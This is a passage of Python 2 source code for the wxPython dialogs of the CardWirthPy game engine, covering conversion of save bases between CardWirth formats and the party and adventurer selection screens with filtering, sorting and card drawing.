bmp = get_playingbmp()
w, h = bmp.GetSize()
dc.DrawBitmap(bmp, (aw-w)//2+x, (ah-h)//2+y, True)
if (index-pindex) % 2 == 1:
x = 0
y += ah
else:
x += aw
# Selected
x = 0
y = 0
for index in xrange(pindex, min(pindex+self.views, len(self.list))):
if index == self.index:
bmp = cw.cwpy.rsrc.wxstatuses["TARGET"]
dc.DrawBitmap(bmp, cw.wins(158)+x, cw.wins(80)+y, True)
if (index-pindex) % 2 == 1:
x = 0
y += ah
else:
x += aw
def conv_yado(self, path, ok=False, moveconverted=False, deletepath=""):
"""
        Convert CardWirth base data to CardWirthPy format.
"""
        # Make sure the directory is a CardWirth base
if not os.path.exists(cw.util.join_paths(path, "Environment.wyd")):
s = u"CardWirthの宿のディレクトリではありません。"
dlg = message.ErrorMessage(self, s)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
return
        # Conversion confirmation dialog
if not ok:
cw.cwpy.play_sound("click")
s = os.path.basename(path) + u" を変換します。\nよろしいですか?"
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
self.Parent.move_dlg(dlg)
if not dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
return
dlg.Destroy()
        # Base data
cwdata = cw.binary.cwyado.CWYado(
path, "Yado", cw.cwpy.setting.skintype)
        # Make sure the data can be converted
if not cwdata.is_convertible():
s = u"CardWirth ver.1.20-1.50の宿しか変換できません。"
dlg = message.ErrorMessage(self, s)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
return
if cw.util.create_mutex(u"Yado"):
try:
thread = cw.binary.ConvertingThread(cwdata)
thread.start()
                # Show a progress dialog
dlg = cw.dialog.progress.ProgressDialog(self, cwdata.name + u"の変換", "",
maximum=100)
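                # A helper thread polls the converter and pushes progress
                # updates to the GUI thread with wx.CallAfter.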
def progress():
while not thread.complete:
wx.CallAfter(dlg.Update, cwdata.curnum, cwdata.message)
time.sleep(0.001)
wx.CallAfter(dlg.Destroy)
thread2 = threading.Thread(target=progress)
thread2.start()
self.Parent.move_dlg(dlg)
dlg.ShowModal()
yadodir = thread.path
                # Show the error log
if cwdata.errorlog:
dlg = cw.dialog.etc.ErrorLogDialog(self, cwdata.errorlog)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
                # Conversion-complete dialog
cw.cwpy.play_sound("harvest")
s = u"データの変換が完了しました。"
dlg = message.Message(self, cw.cwpy.msgs["message"], s, mode=2)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
if deletepath:
cw.util.remove(deletepath)
elif moveconverted:
if not os.path.isdir(u"ConvertedYado"):
os.makedirs(u"ConvertedYado")
topath = cw.util.join_paths(u"ConvertedYado", os.path.basename(path))
topath = cw.binary.util.check_duplicate(topath)
shutil.move(path, topath)
cw.cwpy.play_sound("page")
cw.cwpy.setting.insert_yadoorder(os.path.basename(yadodir))
self.update_list(yadodir, clear_narrowcondition=True)
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
def unconv_yado(self):
"""
        Convert a base back to CardWirth format.
"""
yadodir = self.list[self.index]
yadoname = self.names[self.index]
        # Conversion confirmation dialog
cw.cwpy.play_sound("click")
dlg = cw.dialog.etc.ConvertYadoDialog(self, yadoname)
self.Parent.move_dlg(dlg)
if not dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
return
targetengine = dlg.targetengine
dstpath = dlg.dstpath
dlg.Destroy()
try:
if not os.path.isdir(dstpath):
os.makedirs(dstpath)
except:
cw.util.print_ex()
s = u"フォルダ %s を生成できません。" % (dstpath)
dlg = message.ErrorMessage(self, s)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
return
cw.cwpy.setting.unconvert_targetfolder = dstpath
        # Base data
cw.cwpy.yadodir = cw.util.join_paths(yadodir)
cw.cwpy.tempdir = cw.cwpy.yadodir.replace("Yado", cw.util.join_paths(cw.tempdir, u"Yado"), 1)
try:
ydata = cw.data.YadoData(cw.cwpy.yadodir, cw.cwpy.tempdir, loadparty=False)
            # Converter
unconv = cw.binary.cwyado.UnconvCWYado(ydata, dstpath, targetengine)
thread = cw.binary.ConvertingThread(unconv)
thread.start()
            # Show a progress dialog
dlg = cw.dialog.progress.ProgressDialog(self, u"%sの逆変換" % (yadoname), "",
maximum=unconv.maxnum)
def progress():
while not thread.complete:
wx.CallAfter(dlg.Update, unconv.curnum, unconv.message)
time.sleep(0.001)
wx.CallAfter(dlg.Destroy)
thread2 = threading.Thread(target=progress)
thread2.start()
self.Parent.move_dlg(dlg)
dlg.ShowModal()
finally:
cw.cwpy.yadodir = ""
cw.cwpy.tempdir = ""
        # Show the error log
if unconv.errorlog:
dlg = cw.dialog.etc.ErrorLogDialog(self, unconv.errorlog)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
        # Conversion-complete dialog
cw.cwpy.play_sound("harvest")
s = u"データの逆変換が完了しました。\n%s" % (unconv.dir)
dlg = message.Message(self, cw.cwpy.msgs["message"], s, mode=2)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def update_list(self, yadodir="", clear_narrowcondition=False):
"""
        Refresh the list of registered bases and move
        the page to the base given by yadodir.
"""
if clear_narrowcondition:
self._processing = True
self.narrow.SetValue(u"")
self._processing = False
self._names, self._list, self._list2, self._skins, self._classic, self._isshortcuts, self._imgpaths = self.get_yadolist()
self.list = self._list
if yadodir:
self.index = self.list.index(yadodir)
self.update_narrowcondition()
self.draw(True)
self.enable_btn()
def get_yadolist(self):
"""Yadoにある宿のpathリストと冒険者リストを返す。"""
names = []
yadodirs = []
skins = []
classic = []
isshortcuts = []
imgpaths = []
skin_support = {}
if not os.path.exists(u"Yado"):
os.makedirs(u"Yado")
for dname in os.listdir(u"Yado"):
path = cw.util.join_paths(u"Yado", dname, u"Environment.xml")
if os.path.isfile(path):
prop = cw.header.GetProperty(path)
name = prop.properties.get(u"Name", u"")
if not name:
name = os.path.basename(dname)
names.append(name)
skin = prop.properties.get(u"Skin", u"Classic")
skin = cw.util.join_paths(u"Data/Skin", skin)
skinxml = cw.util.join_paths(skin, u"Skin.xml")
if skinxml in skin_support:
supported_skin = skin_support[skinxml]
else:
if not os.path.isfile(skinxml):
supported_skin = False
else:
supported_skin = cw.header.GetProperty(skinxml).attrs.get(None, {}).get(u"dataVersion",
"0") in cw.SUPPORTED_SKIN
skin_support[skinxml] = supported_skin
if supported_skin:
skins.append(skin)
else:
skins.append(cw.cwpy.skindir)
path = cw.util.join_paths(u"Yado", dname)
yadodirs.append(path)
classic.append(False)
isshortcuts.append("")
imgpaths.append(cw.image.get_imageinfos_p(prop))
continue
path = cw.util.join_paths(u"Yado", dname)
path2 = cw.util.get_linktarget(path)
isshortcut = path2 <> path
if isshortcut:
path = path2
path = cw.util.join_paths(path, u"Environment.wyd")
if os.path.isfile(path):
                # Classic (CardWirth) base
name = os.path.basename(path2)
names.append(name)
skins.append(cw.cwpy.skindir)
yadodirs.append(path2)
classic.append(True)
if isshortcut:
isshortcuts.append(cw.util.join_paths(u"Yado", dname))
else:
isshortcuts.append("")
imgpaths.append([])
continue
advnames = []
for i, yadodir in enumerate(yadodirs):
seq = []
if classic[i]:
                # Classic (CardWirth) base
try:
wyd = cw.util.join_paths(yadodir, u"Environment.wyd")
if not os.path.isfile(wyd):
advnames.append([u"*読込失敗*"])
continue
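                    # Read only the version header; it determines how the
                    # adventurer names are stored on disk.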
with cw.binary.cwfile.CWFile(wyd, "rb") as f:
wyd = cw.binary.environment.Environment(None, f, True, versiononly=True)
if 13 <= wyd.dataversion_int:
                        # 1.50 and later
advnames.append([u"*読込失敗*"])
continue
                    # Album data from 1.20 can take a long time to read,
                    # so it is not shown in the list.
for fname in os.listdir(yadodir):
ext = os.path.splitext(fname)[1].lower()
if ext == ".wch":
fpath = cw.util.join_paths(yadodir, fname)
if wyd.dataversion_int <= 8:
# 1.20
with cw.binary.cwfile.CWFile(fpath, "rb") as f:
f.string()
name = f.string()
seq.append(name)
else:
                                # 1.28 and later
with cw.binary.cwfile.CWFile(fpath, "rb") as f:
adv = cw.binary.adventurer.Adventurer(None, f, nameonly=True)
seq.append(adv.name)
elif ext == ".wpl":
fpath = cw.util.join_paths(yadodir, fname)
with cw.binary.cwfile.CWFile(fpath, "rb") as f:
party = cw.binary.party.Party(None, f, dataversion=wyd.dataversion_int)
for member in party.memberslist:
seq.append(member)
except:
cw.util.print_ex()
else:
yadodb = cw.yadodb.YadoDB(yadodir)
standbys = yadodb.get_standbynames()
if len(standbys) == 0:
yadodb.update(cards=False, adventurers=True, parties=False)
standbys = yadodb.get_standbynames()
seq = standbys
yadodb.close()
advnames.append(seq)
return names, yadodirs, advnames, skins, classic, isshortcuts, imgpaths
#-------------------------------------------------------------------------------
# Party selection dialog
#-------------------------------------------------------------------------------
class PartySelect(MultiViewSelect):
"""
    Resume an adventure.
"""
def __init__(self, parent):
        # Create the dialog box
MultiViewSelect.__init__(self, parent, cw.cwpy.msgs["resume_adventure"], wx.ID_OK, 8,
cw.cwpy.setting.show_multipleparties)
self._bg = None
        # Party information
self.list = cw.cwpy.ydata.partys
self.index = 0
if cw.cwpy.ydata.lastparty:
            # The party selected last time
lastparty = cw.util.get_yadofilepath(cw.cwpy.ydata.lastparty).lower()
for i, header in enumerate(self.list):
if cw.util.get_yadofilepath(header.fpath).lower() == lastparty:
self.index = i
break
self.names = []
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((460, 280)))
        # Narrowing (filter) condition
choices = (cw.cwpy.msgs["all"],
cw.cwpy.msgs["narrow_party_name"],
cw.cwpy.msgs["member_name"],
cw.cwpy.msgs["description"],
cw.cwpy.msgs["history"],
cw.cwpy.msgs["character_attribute"],
cw.cwpy.msgs["sort_level"])
self._init_narrowpanel(choices, u"", cw.cwpy.setting.parties_narrowtype)
# sort
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
self.sort_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["sort_title"])
self.sort_label.SetFont(font)
choices = (cw.cwpy.msgs["sort_no"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["highest_level"],
cw.cwpy.msgs["average_level"],
cw.cwpy.msgs["money"])
self.sort = wx.Choice(self, size=(-1, cw.wins(20)), choices=choices)
self.sort.SetFont(cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(14)))
if cw.cwpy.setting.sort_parties == "Name":
self.sort.Select(1)
elif cw.cwpy.setting.sort_parties == "HighestLevel":
self.sort.Select(2)
elif cw.cwpy.setting.sort_parties == "AverageLevel":
self.sort.Select(3)
elif cw.cwpy.setting.sort_parties == "Money":
self.sort.Select(4)
else:
self.sort.Select(0)
width = 50
# ok
self.okbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_OK, cw.wins((width, 23)), cw.cwpy.msgs["decide"])
self.buttonlist.append(self.okbtn)
# info
self.infobtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), cw.cwpy.msgs["information"])
self.buttonlist.append(self.infobtn)
# edit
self.editbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), cw.cwpy.msgs["members"])
self.buttonlist.append(self.editbtn)
# view
s = cw.cwpy.msgs["member_list"] if self.views == 1 else cw.cwpy.msgs["member_one"]
self.viewbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), s)
self.buttonlist.append(self.viewbtn)
# partyrecord
self.partyrecordbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((width, 23)), cw.cwpy.msgs["party_record"])
self.buttonlist.append(self.partyrecordbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((width, 23)), cw.cwpy.msgs["entry_cancel"])
self.buttonlist.append(self.closebtn)
# additionals
self.create_addctrlbtn(self.toppanel, self._get_bg(), cw.cwpy.setting.show_additional_party)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(self.addctrlbtn, 0, wx.ALIGN_TOP, 0)
self.toppanel.SetSizer(sizer)
self.additionals.append(self.narrow_label)
self.additionals.append(self.narrow)
self.additionals.append(self.narrow_type)
self.additionals.append(self.sort_label)
self.additionals.append(self.sort)
self.update_additionals()
self.update_narrowcondition()
# enable btn
self.enable_btn()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnClickInfoBtn, self.infobtn)
self.Bind(wx.EVT_BUTTON, self.OnClickEditBtn, self.editbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickViewBtn, self.viewbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickPartyRecordBtn, self.partyrecordbtn)
self.Bind(wx.EVT_CHOICE, self.OnSort, self.sort)
self.toppanel.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
seq = self.accels
self.sortkeydown = []
for i in xrange(0, 9):
sortkeydown = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnNumberKeyDown, id=sortkeydown)
seq.append((wx.ACCEL_CTRL, ord('1')+i, sortkeydown))
self.sortkeydown.append(sortkeydown)
self.append_addctrlaccelerator(seq)
cw.util.set_acceleratortable(self, seq)
self.draw(True)
def save_views(self, multi):
cw.cwpy.setting.show_multipleparties = multi
def update_additionals(self):
Select.update_additionals(self)
cw.cwpy.setting.show_additional_party = self.addctrlbtn.GetToggle()
def _add_topsizer(self):
nsizer = wx.BoxSizer(wx.HORIZONTAL)
nsizer.Add(self.narrow_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(2))
nsizer.Add(self.narrow, 1, wx.CENTER, 0)
nsizer.Add(self.narrow_type, 0, wx.CENTER|wx.EXPAND, cw.wins(3))
nsizer.Add(self.sort_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(3))
nsizer.Add(self.sort, 0, wx.CENTER|wx.EXPAND, 0)
self.topsizer.Add(nsizer, 0, wx.EXPAND, 0)
def _on_narrowcondition(self):
cw.cwpy.setting.parties_narrowtype = self.narrow_type.GetSelection()
self.update_narrowcondition()
self.draw(True)
def update_narrowcondition(self):
        if 0 <= self.index < len(self.list):
selected = self.list[self.index]
else:
selected = None
self.list = cw.cwpy.ydata.partys[:]
narrow = self.narrow.GetValue().lower()
donarrow = self.narrow.IsShown() and bool(narrow)
ntype = self.narrow_type.GetSelection()
if donarrow:
hiddens = set([u"_", u"@"])
attrs = set(cw.cwpy.setting.periodnames)
attrs.update(cw.cwpy.setting.sexnames)
attrs.update(cw.cwpy.setting.naturenames)
attrs.update(cw.cwpy.setting.makingnames)
_NARROW_ALL = 0
_NARROW_NAME = 1
_NARROW_MEMBER = 2
_NARROW_DESC = 3
_NARROW_HISTORY = 4
_NARROW_FEATURES = 5
_NARROW_LEVEL = 6
if ntype in (_NARROW_LEVEL, _NARROW_ALL):
                # Level
try:
intnarrow = int(narrow)
except:
intnarrow = None
ntypes = set()
if ntype == _NARROW_ALL:
ntypes.add(_NARROW_NAME)
ntypes.add(_NARROW_MEMBER)
ntypes.add(_NARROW_DESC)
ntypes.add(_NARROW_HISTORY)
ntypes.add(_NARROW_FEATURES)
ntypes.add(_NARROW_LEVEL)
else:
ntypes.add(ntype)
seq = []
for header in self.list:
def has_membername():
for mname in header.get_membernames():
if narrow in mname.lower():
return True
return False
def has_memberdesc():
for mdesc in header.get_memberdescs():
if narrow in mdesc.lower():
return True
return False
def has_memberhistory():
for coupons in header.get_membercoupons():
for coupon in coupons:
if coupon:
if cw.cwpy.is_debugmode():
if coupon[0] == u"_" and coupon[1:] in attrs:
continue
else:
if coupon[0] in hiddens:
continue
if narrow in coupon.lower():
return True
return False
def has_memberfeatures():
for coupons in header.get_membercoupons():
for coupon in coupons:
if coupon and coupon[0] == u"_":
coupon = coupon[1:]
if coupon in attrs:
if narrow in coupon.lower():
return True
return False
def has_memberlevel():
if intnarrow is None:
return False
                    maxlevel = max(header.get_memberlevels())
                    minlevel = min(header.get_memberlevels())
return (minlevel <= intnarrow <= maxlevel)
if (_NARROW_NAME in ntypes and narrow in header.name.lower()) or\
(_NARROW_MEMBER in ntypes and has_membername()) or \
(_NARROW_DESC in ntypes and has_memberdesc()) or \
(_NARROW_HISTORY in ntypes and has_memberhistory()) or \
(_NARROW_FEATURES in ntypes and has_memberfeatures()) or \
(_NARROW_LEVEL in ntypes and has_memberlevel()):
seq.append(header)
self.list = seq
if selected in self.list:
self.index = self.list.index(selected)
elif self.list:
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
def _get_bg(self):
if self._bg:
return self._bg
path = "Table/Book"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
self._bg = cw.util.load_wxbmp(path, can_loaded_scaledimage=True)
return self._bg
def OnNumberKeyDown(self, event):
"""
        Handle presses of the number keys '1' through '9'.
        In PlayerSelect this changes the sort condition.
"""
if self._processing:
return
if self.sort.IsShown():
index = self.sortkeydown.index(event.GetId())
if index < self.sort.GetCount():
self.sort.SetSelection(index)
event = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, self.sort.GetId())
self.ProcessEvent(event)
def OnSort(self, event):
if self._processing:
return
index = self.sort.GetSelection()
if index == 1:
sorttype = "Name"
elif index == 2:
sorttype = "HighestLevel"
elif index == 3:
sorttype = "AverageLevel"
elif index == 4:
sorttype = "Money"
else:
sorttype = "None"
if cw.cwpy.setting.sort_parties <> sorttype:
cw.cwpy.play_sound("page")
cw.cwpy.setting.sort_parties = sorttype
cw.cwpy.ydata.sort_parties()
self.update_narrowcondition()
self.draw(True)
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if change_combo(self.narrow_type, event):
return
elif change_combo(self.sort, event):
return
else:
MultiViewSelect.OnMouseWheel(self, event)
def OnClickInfoBtn(self, event):
if not self.list:
return
cw.cwpy.play_sound("click")
header = self.list[self.index]
party = cw.data.Party(header, True)
dlg = cw.dialog.edit.PartyEditor(self.Parent, party)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
header = cw.cwpy.ydata.create_partyheader(element=party.data.find("Property"))
header.data = party
self.list[self.index] = header
cw.cwpy.ydata.partys[self.index] = header
self.draw(True)
def OnClickEditBtn(self, event):
if not self.list:
return
partyheader = self.list[self.index]
def redrawfunc():
def func():
header = self.list[self.index]
header = cw.cwpy.ydata.create_partyheader(header.fpath)
header.data = partyheader.data
self.list[self.index] = header
cw.cwpy.ydata.partys[self.index] = header
cw.cwpy.frame.exec_func(self.draw, True)
cw.cwpy.exec_func(func)
cw.cwpy.play_sound("click")
dlg = cw.dialog.charainfo.StandbyPartyCharaInfo(self.Parent, partyheader, redrawfunc)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def OnClickPartyRecordBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("click")
dlg = cw.dialog.partyrecord.SelectPartyRecord(self)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
if not (1 < len(dlg.list) or cw.cwpy.ydata.party):
self.partyrecordbtn.Disable()
dlg.Destroy()
def get_selected(self):
if self.list:
return self.list[self.index]
else:
return None
def update_standbys(self, selected):
pass
def can_clickcenter(self):
return self.okbtn.IsEnabled()
def enable_btn(self):
        # Disable the buttons when the list is empty
if not self.list:
enables = set()
if cw.cwpy.ydata.party or cw.cwpy.ydata.partyrecord:
enables.add(self.partyrecordbtn)
enables.add(self.closebtn)
self._disable_btn(enables)
elif len(self.list) == 1:
self._enable_btn((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
else:
self._enable_btn()
if not (cw.cwpy.ydata.party or cw.cwpy.ydata.partyrecord):
self.partyrecordbtn.Disable()
def draw(self, update=False):
dc = Select.draw(self, update)
        # Background
bmp = cw.wins(self._get_bg())
bmpw = bmp.GetSize()[0]
dc.DrawBitmap(bmp, 0, 0, False)
        # Nothing more to draw when the list is empty
if not self.list:
return
def get_image(header):
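            # Returns (bitmaps, unscaled bitmaps, first-member thumbnails,
            # scenario header, image infos) for one party entry.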
sceheader = header.get_sceheader()
if sceheader:
bmp, bmp_noscale, imgpaths = sceheader.get_wxbmps()
else:
if cw.cwpy.ydata.imgpaths:
                    imgpaths = []
                    bmp = []
                    bmp_noscale = []
for info in cw.cwpy.ydata.imgpaths:
if not info.path:
continue
fpath = cw.util.join_paths(cw.cwpy.ydata.yadodir, info.path)
bmp_noscale2 = cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=True)
bmp2 = cw.wins(bmp_noscale2)
bmp.append(bmp2)
bmp_noscale.append(None)
imgpaths.append(info)
else:
path = "Resource/Image/Card/COMMAND0"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
bmp_noscale = [cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True)]
bmp = [cw.wins(bmp_noscale[0])]
imgpaths = [cw.image.ImageInfo(path=path)]
paths = header.get_memberpaths()
bmp2 = []
if paths:
fpath = paths[0]
fpath = cw.util.get_yadofilepath(fpath)
if os.path.isfile(fpath):
prop = cw.header.GetProperty(fpath)
paths = cw.image.get_imageinfos_p(prop)
for info in paths:
info.path = cw.util.join_yadodir(info.path)
can_loaded_scaledimage = cw.util.str2bool(prop.attrs[None].get("scaledimage", "False"))
for info in paths:
fpath = info.path
if os.path.isfile(fpath):
bmp3 = cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=can_loaded_scaledimage)
bmp4 = cw.wins(bmp3)
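                            # Shrink the portrait to half size for the overlay.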
w = bmp4.GetWidth() // 2
h = bmp4.GetHeight() // 2
if w and h:
bmpdepthis1 = hasattr(bmp4, "bmpdepthis1")
maskcolour = bmp4.maskcolour if hasattr(bmp4, "maskcolour") else None
if bmpdepthis1:
img = cw.util.convert_to_image(bmp4)
else:
img = bmp4.ConvertToImage()
img = img.Rescale(w, h, wx.IMAGE_QUALITY_NORMAL)
bmp4 = img.ConvertToBitmap()
if bmpdepthis1:
bmp4.bmpdepthis1 = bmpdepthis1
if maskcolour:
bmp4.maskcolour = maskcolour
bmp2.append((bmp3, bmp4, info))
return bmp, bmp_noscale, bmp2, sceheader, imgpaths
if self.views == 1:
            # Single view
header = self.list[self.index]
            # Heading
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = cw.cwpy.msgs["adventurers_team"]
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(25))
            # Money
s = cw.cwpy.msgs["adventurers_money"] % (header.money)
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(60))
            # Member names
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
if update:
self.names = header.get_membernames()
if len(header.members) > 3:
n = (3, len(self.names) - 3)
else:
n = (len(self.names), 0)
w = cw.wins(90)
for index, s in enumerate(self.names):
s = cw.util.abbr_longstr(dc, s, cw.wins(90))
if index < 3:
dc.DrawLabel(s, wx.Rect((bmpw-w*n[0])/2+w*index, cw.wins(85), w, cw.wins(15)), wx.ALIGN_CENTER)
else:
dc.DrawLabel(s, wx.Rect((bmpw-w*n[1])/2+w*(index-3), cw.wins(105), w, cw.wins(15)), wx.ALIGN_CENTER)
            # Party name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(20)))
s = header.name
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(40))
            # Scenario / base image
bmp, bmp_noscale, bmp2, sceheader, imgpaths = get_image(header)
ix = (bmpw-cw.wins(74))//2
iy = cw.wins(125)
dc.SetClippingRect((ix, iy, cw.wins(cw.SIZE_CARDIMAGE[0]), cw.wins(cw.SIZE_CARDIMAGE[1])))
for b, bns, info in zip(bmp, bmp_noscale, imgpaths):
baserect = info.calc_basecardposition_wx(b.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
if bns is None:
dc.DrawBitmap(b, ix+baserect.x, iy+baserect.y, True)
else:
cw.imageretouch.wxblit_2bitbmp_to_card(dc, b, ix+baserect.x, iy+baserect.y, True, bitsizekey=bns)
dc.DestroyClippingRegion()
            # Draw the party's leading member at half size
px = bmpw/2
py = cw.wins(125+47)
pw = cw.wins(cw.SIZE_CARDIMAGE[0])
ph = cw.wins(cw.SIZE_CARDIMAGE[1])
dc.SetClippingRect(wx.Rect(px, py, pw//2, ph//2))
for bmp3, bmp4, info in bmp2:
iw, ih = bmp3.GetSize()
scr_scale = bmp3.scr_scale if hasattr(bmp3, "scr_scale") else 1
iw //= scr_scale
ih //= scr_scale
baserect = info.calc_basecardposition_wx((iw, ih), noscale=True,
basecardtype="LargeCard",
cardpostype="NotCard")
baserect = cw.wins(baserect)
baserect.x //= 2
baserect.y //= 2
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp4, px+baserect.x, py+baserect.y, True, bitsizekey=bmp3)
dc.DestroyClippingRegion()
            # Scenario / base name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
if sceheader:
s = sceheader.name
else:
s = cw.cwpy.ydata.name
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(225))
            # Page number
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
            s = str(self.index+1)
s = s + " / " + str(len(self.list))
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(250))
else:
            # List view
page = self.get_page()
sindex = page * self.views
seq = self.list[sindex:sindex+self.views]
x = 0
y = 0
size = self.toppanel.GetSize()
rw = size[0] / (self.views / 2)
rh = size[1] / 2
dc.SetTextForeground(wx.BLACK)
for i, header in enumerate(seq):
                # Base / scenario image
bmp, bmp_noscale, bmp2, sceheader, imgpaths = get_image(header)
ix = x + (rw - cw.wins(72)) / 2
                iy = y + cw.wins(5)
dc.SetClippingRect((ix, iy, cw.wins(cw.SIZE_CARDIMAGE[0]), cw.wins(cw.SIZE_CARDIMAGE[1])))
for b, bns, info in zip(bmp, bmp_noscale, imgpaths):
baserect = info.calc_basecardposition_wx(b.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
if bns is None:
dc.DrawBitmap(b, ix+baserect.x, iy+baserect.y, True)
else:
cw.imageretouch.wxblit_2bitbmp_to_card(dc, b, ix+baserect.x, iy+baserect.y, True, bitsizekey=bns)
dc.DestroyClippingRegion()
                # Draw the party's leading member at half size
px = ix + cw.wins(37)
py = iy + cw.wins(47)
pw = cw.wins(cw.SIZE_CARDIMAGE[0])
ph = cw.wins(cw.SIZE_CARDIMAGE[1])
dc.SetClippingRect(wx.Rect(px, py, pw//2, ph//2))
for bmp3, bmp4, info in bmp2:
iw, ih = bmp3.GetSize()
scr_scale = bmp3.scr_scale if hasattr(bmp3, "scr_scale") else 1
iw //= scr_scale
ih //= scr_scale
baserect = info.calc_basecardposition_wx((iw, ih), noscale=True,
basecardtype="LargeCard",
cardpostype="NotCard")
baserect = cw.wins(baserect)
baserect.x //= 2
baserect.y //= 2
cw.imageretouch.wxblit_2bitbmp_to_card(dc, bmp4, px+baserect.x, py+baserect.y, True, bitsizekey=bmp3)
dc.DestroyClippingRegion()
                # Party name
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = header.name
s = cw.util.abbr_longstr(dc, s, rw)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, x + (rw - w) / 2, y + cw.wins(105))
                # Scenario / base name
if sceheader:
s = sceheader.name
s = cw.util.abbr_longstr(dc, s, rw)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, x + (rw - w) / 2, y + cw.wins(120))
                # Selection marker
if sindex + i == self.index:
bmp = cw.cwpy.rsrc.wxstatuses["TARGET"]
dc.DrawBitmap(bmp, ix + cw.wins(58), iy + cw.wins(80), True)
if self.views / 2 == i + 1:
x = 0
y += rh
else:
x += rw
            # Page number
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
            s = str(page+1)
s = s + " / " + str(self.get_pagecount())
cw.util.draw_witharound(dc, s, cw.wins(5), cw.wins(5))
#-------------------------------------------------------------------------------
# Adventurer selection dialog
#-------------------------------------------------------------------------------
class PlayerSelect(MultiViewSelect):
"""
    Open the adventurer register.
"""
def __init__(self, parent):
        # Create the dialog box
MultiViewSelect.__init__(self, parent, cw.cwpy.msgs["select_member_title"], wx.ID_ADD, 10,
cw.cwpy.setting.show_multipleplayers)
self._bg = None
        # Adventurer information
self.list = []
self.isalbum = False
self.index = 0
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((460, 280)))
self.toppanel.SetMinSize(cw.wins((460, 280)))
        # Narrowing (filter) condition
choices = (cw.cwpy.msgs["all"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["description"],
cw.cwpy.msgs["history"],
cw.cwpy.msgs["character_attribute"],
cw.cwpy.msgs["sort_level"])
self._init_narrowpanel(choices, u"", cw.cwpy.setting.standbys_narrowtype)
# sort
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
self.sort_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["sort_title"])
self.sort_label.SetFont(font)
choices = (cw.cwpy.msgs["sort_no"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["sort_level"])
